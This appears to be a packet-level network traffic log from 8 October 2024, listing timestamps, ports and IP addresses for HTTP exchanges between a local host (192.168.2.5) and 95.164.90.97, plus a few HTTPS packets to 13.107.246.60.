Oct 8, 2024 20:47:32.312621117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312643051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312654018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312675953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312709093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312716961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312736034 CEST	443	49828	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.312746048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312762022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312777996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312794924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312812090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312820911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312845945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312858105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312879086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312889099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312912941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312926054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312944889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312957048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312978983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312989950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313011885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313023090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313045979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313055992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313088894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313375950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313430071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313441992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313462973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313472986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313497066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313502073 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313529968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313539028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313563108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313575029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313596010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313606024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313627958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313636065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313658953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313672066 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313690901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313704014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313725948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313736916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313759089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313771009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313772917 CEST	49828	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.313781977 CEST	443	49828	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.313792944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313823938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313826084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313838005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313858986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313874960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313891888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313906908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313925028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313935995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313957930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313968897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.313992023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.313999891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314033985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314045906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314068079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314078093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314105988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314109087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314140081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314148903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314172983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314186096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314208984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314219952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314240932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314254045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314275026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314285040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314306974 CEST	49828	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.314307928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314311981 CEST	443	49828	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.314320087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314347982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314358950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314382076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314387083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314414978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314428091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314457893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314560890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314594984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314605951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314629078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314640999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314673901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314681053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314713955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314728975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314748049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314759016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314779997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314790964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314814091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314824104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314847946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314857960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314882040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314891100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314919949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314930916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314954042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314965010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.314987898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.314997911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315021992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315032959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315056086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315066099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315089941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315099955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315120935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315139055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315159082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315165043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315191984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315197945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315231085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315264940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315277100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315299034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315306902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315335035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315345049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315366983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315377951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315409899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315462112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315498114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315506935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315534115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315543890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315568924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315576077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315603018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315613031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315639019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315759897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315776110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315790892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315800905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315804958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315819979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315826893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315828085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315845013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.315845966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315865993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.315876961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335275888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335304976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335320950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335331917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335346937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335356951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335376978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335406065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335443974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335515976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335525990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335536003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335546970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335557938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335561037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335566044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335597992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335736036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335746050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335756063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335767031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335777998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335783958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335794926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335803032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335827112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335829973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335840940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335863113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335876942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335896015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335928917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335942030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.335963011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.335973024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336009026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336133003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336165905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336180925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336199045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336235046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336247921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336267948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336278915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336301088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336313009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336335897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336347103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336369038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336380005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336400986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336416960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336433887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336443901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336467981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336477995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336499929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336534977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336576939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336611032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336621046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336671114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336673021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336704016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336716890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336738110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336747885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336770058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336782932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336803913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336815119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336837053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336847067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336870909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336882114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336904049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336911917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336936951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336946011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.336971998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.336976051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337002993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337013006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337035894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337048054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337069988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337086916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337104082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337111950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337151051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337156057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337188959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337201118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337230921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337240934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337277889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337285042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337306976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337322950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337338924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337349892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337373972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337382078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337407112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337414980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337441921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337454081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337475061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337486029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337508917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337519884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337542057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337553024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337574959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337584972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337610006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337621927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337645054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337652922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337677956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337687969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337713003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337723017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337744951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337758064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337778091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337786913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337814093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337821960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337847948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337857008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337881088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337893963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337914944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337924957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337949038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337958097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.337985039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.337987900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338027954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338387012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338419914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338443041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338453054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338486910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338498116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338504076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338536978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338545084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338570118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338578939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338603020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338618040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338635921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338646889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338669062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338680029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338701963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338715076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338735104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338745117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338767052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338777065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338800907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338812113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338833094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338843107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338865995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338876009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338900089 CEST	80	49755	95.164.90.97	192.168.2.5
